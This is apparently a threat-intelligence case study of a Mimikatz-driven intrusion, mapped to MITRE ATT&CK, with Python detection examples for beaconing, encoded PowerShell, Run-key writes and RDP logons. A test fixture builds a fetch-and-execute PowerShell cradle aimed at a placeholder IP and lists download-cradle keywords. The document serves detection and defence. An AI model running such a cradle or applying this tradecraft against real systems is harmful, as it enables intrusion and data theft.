Nina Kovacs — Exploit Research Analyst
Key Takeaways
- Credential dumping with Mimikatz (T1003, OS Credential Dumping) was central to this intrusion, as it frequently is in targeted attacks: the harvested credentials drove every later stage.
- Lateral movement was consistent with T1021.001 (Remote Services: Remote Desktop Protocol), using harvested credentials so that the activity blended in with legitimate administrative sessions rather than relying on exploits.
- Command and control was persistent and ran over HTTPS, mapped to T1071.001 (Application Layer Protocol: Web Protocols), with a dynamically generated domain and rotating IP addresses behind it.
Executive Summary
During our investigation of a recent malware campaign, we observed an intrusion that used Mimikatz to extract credentials from compromised endpoints. The actor employed a multi-stage chain: a phishing lure for the initial foothold, a PowerShell stager that fetched the second-stage payload, a registry Run key for persistence, HTTPS-based command and control, RDP with the harvested credentials for lateral movement, and finally scheduled, low-volume data exfiltration. This case study describes the tactics observed, the implications of the indicators we recovered, and recommendations for improving detection coverage.
Initial Access
The attack began with a phishing email carrying a malicious attachment that masqueraded as an important document. When the user opened it, the dropper launched a PowerShell command that retrieved additional payloads from a remote server. In the sample we examined, the second stage was fetched by a script passed through powershell -EncodedCommand, which takes the Base64 encoding of a UTF-16LE string. The encoding hides the script from casual inspection of the command line, but it is trivially reversible, so any detection logic should decode the argument and inspect the plaintext rather than matching on the encoded blob. This initial access method maps to T1566 (Phishing): it relied on human curiosity rather than on a software vulnerability.
Execution & Persistence
Once the second-stage payload ran, it established persistence using T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder). Specifically, the malware created a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run so that it would execute at every logon of the compromised user. Because this key is writable by an unprivileged user, no elevation was needed. The entry was chosen to look innocuous: its value name and image path resembled those of legitimate software, which makes it easy to overlook during manual review.
Command and Control
Our analysis of the network traffic showed that the malware communicated with its command and control server over HTTPS, consistent with T1071.001 (Application Layer Protocol: Web Protocols). TLS hides the request content and lets the beacon traffic blend in with ordinary web browsing. The C2 domain was dynamically generated and resolved to rotating IP addresses (domain fluxing), so blocking by IP address or by a static domain list was ineffective; detection has to rely on the behaviour of the connections, such as their timing and the server name presented in the TLS handshake, rather than on the destination itself. During the investigation we identified several command sequences used by the implant, indicating a control channel for downloading further payloads and executing administrative tasks.
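The timing-based approach described above can be demonstrated with an added example, which is not code from the original report. It groups TLS connections by the server name presented in the handshake rather than by destination IP (since the C2 rotated IPs behind a generated domain) and flags hosts whose inter-connection intervals are unusually regular. The hostnames, timestamps and intervals are constructed for illustration.

```python
import statistics
from collections import defaultdict


def _timeline(start, intervals):
    """Build absolute epoch timestamps from a start time and a list of gaps."""
    t, out = start, [start]
    for gap in intervals:
        t += gap
        out.append(t)
    return out


# Constructed TLS connection log (NOT from the original report): (epoch seconds, SNI host).
# The first host beacons roughly every 60 s with a few seconds of jitter; the second is
# a user browsing a news site at irregular intervals. Both names are hypothetical.
BEACON_HOST = "cdn-upd4te.example"
NOISY_HOST = "news.example"
SAMPLE_CONNECTIONS = (
    [(t, BEACON_HOST) for t in _timeline(1_700_000_000, [60, 58, 63, 61, 57, 62, 59, 60, 61, 58])]
    + [(t, NOISY_HOST) for t in _timeline(1_700_000_005, [5, 300, 12, 1200, 45, 3, 600, 90])]
)


def beacon_candidates(connections, min_connections=6, max_cv=0.2):
    """Return {host: (mean_interval_s, cv)} for hosts whose connection timing looks
    like a beacon. cv is the coefficient of variation (stdev / mean) of the gaps
    between consecutive connections; a small cv means a regular interval."""
    by_host = defaultdict(list)
    for ts, host in sorted(connections):
        by_host[host].append(ts)

    candidates = {}
    for host, times in by_host.items():
        if len(times) < min_connections:      # too few samples to judge regularity
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            candidates[host] = (round(mean, 2), round(cv, 3))
    return candidates


if __name__ == "__main__":
    for host, (mean, cv) in beacon_candidates(SAMPLE_CONNECTIONS).items():
        print(f"beacon-like: {host} every ~{mean}s (cv={cv})")
```

The jitter of a few seconds in the constructed beacon still passes the threshold; an implant that sleeps for a widely randomized interval will not, which is why interval regularity is a hunting heuristic to combine with connection count, request size and rarity of the destination, not a stand-alone rule.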
Lateral Movement & Discovery
Using the credentials harvested earlier, the actor moved laterally with T1021.001 (Remote Services: Remote Desktop Protocol). The sample we analyzed automated this step: it ran Mimikatz to extract credentials from LSASS process memory (T1003.001) and reused them to open RDP sessions to other machines in the organization. Because these were valid credentials over a legitimate remote-access protocol, the sessions looked like ordinary administrative activity. Each newly reached host was used to enumerate internal resources and to establish additional footholds.
Impact & Objectives
The overarching goal of the operation appeared to be the theft of sensitive information, in particular customer data, presumably for resale. After establishing persistence and moving laterally, the actor deployed a data exfiltration tool that ran under scheduled tasks (T1053.005) and siphoned data off periodically. Splitting the exfiltration into small, scheduled transfers reflects the actor's priority of keeping a low profile while achieving their objectives.
MITRE ATT&CK Mapping
- T1566 – Phishing: deceptive email with a malicious attachment used for initial access.
- T1059.001 – Command and Scripting Interpreter: PowerShell: encoded PowerShell stager that retrieved the second-stage payload.
- T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder: persistence through a value under HKCU\...\CurrentVersion\Run.
- T1071.001 – Application Layer Protocol: Web Protocols: HTTPS command and control that blends with normal web traffic.
- T1003.001 – OS Credential Dumping: LSASS Memory: Mimikatz used to extract credentials from memory.
- T1021.001 – Remote Services: Remote Desktop Protocol: lateral movement with the harvested credentials.
- T1053.005 – Scheduled Task/Job: Scheduled Task: periodic execution of the exfiltration tool.
Detection Opportunities
- Monitor PowerShell process creation for the -EncodedCommand switch and its abbreviations (-e, -ec, -enc), decode the Base64/UTF-16LE argument, and alert on download cradles in the plaintext such as DownloadString, Net.WebClient or Invoke-Expression. Matching on the encoded blob alone is brittle, since the encoding changes with every byte of the script.
- Alert on modifications to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (Sysmon Event ID 13, RegistryEvent value set), and prioritize entries whose image path points into a user-writable location such as AppData or Temp. Legitimate installers also write to this key, so baseline expected entries before alerting broadly.
- Log RDP logons (Windows Security Event ID 4624 with logon type 10) and alert on sessions that use unexpected accounts or originate from sources outside the jump hosts and administrative subnets that are supposed to initiate RDP.
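The three detection opportunities above, and the encoded PowerShell stager described under Initial Access, are demonstrated in the following added example. It is not code from the original report: it runs simple triage logic over a handful of constructed event records shaped loosely like Sysmon (Event ID 1 and 13) and Windows Security (4624) entries. The command line, registry paths, account names, IP addresses and the trusted RDP source subnet are all assumptions made for the example.

```python
import base64
import ipaddress
import re

# --- Constructed sample events (NOT from the original report) -----------------
# The encoded PowerShell stage is built at import time so the decoder below has a
# realistic -EncodedCommand argument (UTF-16LE text, Base64-encoded) to work on.
STAGE2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s2.ps1')"
ENCODED = base64.b64encode(STAGE2_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # Sysmon 1: encoded PowerShell download cradle (malicious)
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}"},
    # Sysmon 1: ordinary script execution (benign)
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    # Sysmon 13: new Run key value pointing into the user's AppData (malicious)
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveUpdate",
     "Details": r"C:\Users\jdoe\AppData\Roaming\OneDrive\update.exe"},
    # Sysmon 13: unrelated registry write (benign)
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayVersion",
     "Details": "23.01"},
    # Security 4624 type 10: RDP from outside the trusted admin subnet (suspicious)
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "jdoe", "IpAddress": "192.0.2.77"},
    # Security 4624 type 10: RDP from a jump host inside the trusted subnet (benign)
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "helpdesk01", "IpAddress": "10.10.50.12"},
]

# --- Detection logic -----------------------------------------------------------
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CRADLE_TOKENS = ("downloadstring", "downloadfile", "invoke-expression", "iex",
                 "net.webclient", "frombase64string", "invoke-webrequest")
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\([^\\]+)$", re.IGNORECASE)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def decode_encoded_command(cmdline):
    """Return the plaintext script behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def flag_powershell(event):
    """Decode encoded PowerShell and report download-cradle keywords in the plaintext."""
    if event.get("EventID") != 1 or "powershell" not in event.get("Image", "").lower():
        return []
    script = decode_encoded_command(event.get("CommandLine", ""))
    if script is None:
        return []
    hits = [t for t in CRADLE_TOKENS if t in script.lower()]
    return [{"technique": "T1059.001", "reason": "encoded PowerShell",
             "decoded": script, "cradle_tokens": hits}]


def flag_run_key(event):
    """Report Run/RunOnce value writes; note whether the image lives in a user-writable path."""
    if event.get("EventID") != 13:
        return []
    m = RUN_KEY.search(event.get("TargetObject", ""))
    if not m:
        return []
    image = event.get("Details", "")
    return [{"technique": "T1547.001", "value_name": m.group(1), "image": image,
             "user_writable_path": any(p in image.lower() for p in USER_WRITABLE)}]


def flag_rdp_logon(event, trusted_sources):
    """Report RemoteInteractive (type 10) logons from outside the trusted source networks."""
    if event.get("EventID") != 4624 or int(event.get("LogonType", 0)) != 10:
        return []
    try:
        src = ipaddress.ip_address(event.get("IpAddress", "-"))
    except ValueError:
        src = None                             # "-" placeholder: treat as untrusted
    if src is not None and any(src in net for net in trusted_sources):
        return []
    return [{"technique": "T1021.001", "user": event.get("TargetUserName"),
             "source": event.get("IpAddress")}]


def triage(events, trusted_rdp_sources=("10.10.50.0/24",)):
    """Run all three detections over a list of events and return the findings in order."""
    nets = [ipaddress.ip_network(n) for n in trusted_rdp_sources]
    findings = []
    for ev in events:
        findings += flag_powershell(ev) + flag_run_key(ev) + flag_rdp_logon(ev, nets)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

In production the trusted RDP sources would come from an asset inventory rather than a constant, and the Run key check would be paired with an allowlist of known installers to keep the alert volume manageable.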
Analyst Notes
This case shows how attackers pair an initial access method rooted in social engineering with rapid credential harvesting and lateral movement over legitimate protocols. Organizations should train users to recognize phishing, reduce the value of dumped credentials (for example by limiting where privileged accounts log on interactively and by protecting LSASS with Credential Guard or similar controls), and monitor for lateral movement behaviour such as RDP sessions from unexpected sources. No single control would have stopped this chain; layered prevention and detection across each stage is what makes similar operations fail early.
Source: Original Report